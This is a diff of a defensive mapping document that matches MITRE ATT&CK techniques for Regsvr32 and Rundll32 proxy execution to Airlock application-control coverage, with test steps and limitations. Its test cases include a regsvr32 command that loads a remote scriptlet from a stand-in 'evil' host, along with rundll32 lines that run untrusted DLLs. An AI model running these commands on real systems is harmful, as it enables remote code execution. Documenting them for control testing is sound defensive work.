rmsairlock/Airlock-Mitre-Attack-Research/Airlock-Mitre-Mapping.md

 **Test:** 1) Blocklist regsvcs/regasm.
 2) Loaded assembly must be trusted.

 ### T1218.010 - Regsvr32
-**Yes** 🟢 | blocklist + DLL-control | Testable: yes
+**Yes** 🟢 | DLL-control | Testable: yes

-Regsvr32.
-COM object registration.
-Loads DLLs.
-Can be blocklisted.
-DLLs must be trusted.
-Network-based scriptlet execution also blocked if regsvr32 blocklisted.
+Regsvr32 proxy execution technique.
+Any DLL that regsvr32 attempts to load must be trusted via DLL control.
+Untrusted DLLs blocked at load time regardless of how regsvr32 is invoked.
+Note: blanket blocklisting regsvr32.exe is impractical as it is used by Windows for legitimate COM registration.
+DLL control is the primary defense.

-**Test:** 1) Blocklist regsvr32.exe.
-2) Regsvr32 loading untrusted DLL -> blocked.
-3) regsvr32 /s /n /u /i:http://evil scrobj.dll -> blocked if regsvr32 blocklisted.
+**Test:** 1) regsvr32 untrusted.dll -> DLL blocked at load.
+2) regsvr32 /s /n /u /i:http://evil/script scrobj.dll -> if scrobj.dll payload writes untrusted DLL, blocked.
+DLL control catches the payload regardless.

-**Limitations:** Key LOLBIN.
+**Limitations:** regsvr32 itself cannot be practically blocklisted without breaking Windows.
+The defense is DLL control on what regsvr32 loads, not blocking regsvr32.

 ### T1218.011 - Rundll32
-**Yes** 🟢 | DLL-control + blocklist | Testable: yes
+**Yes** 🟢 | DLL-control | Testable: yes

-Rundll32.
-Executes DLL exports.
-DLL must be trusted.
-Rundll32 can be blocklisted for non-admins.
+Rundll32 executes DLL exports.
+Any DLL passed to rundll32 must be trusted via DLL control.
+Untrusted DLLs blocked at load time.
+Note: blanket blocklisting rundll32.exe is impractical as it is used by Windows for Control Panel, shell extensions, and system operations.
+Restricting rundll32 for non-admins via metarule is possible but aggressive - evaluate operational impact.
+DLL control is the primary defense.

-**Test:** 1) rundll32 untrusted.dll,EntryPoint -> DLL blocked.
-2) Blocklist rundll32 for non-admins.
+**Test:** rundll32 C:\Temp\untrusted.dll,EntryPoint -> DLL blocked at load.
+DLL control catches the payload regardless of how rundll32 is invoked.

-**Limitations:** Rundll32 with trusted DLLs runs normally.
+**Limitations:** rundll32 with trusted DLLs runs normally.
+Blocklisting rundll32 for non-admins is possible via metarule but may break legitimate functionality.
+Test thoroughly in audit mode.

 ### T1218.012 - Verclsid
 **Yes** 🟢 | DLL-control | Testable: yes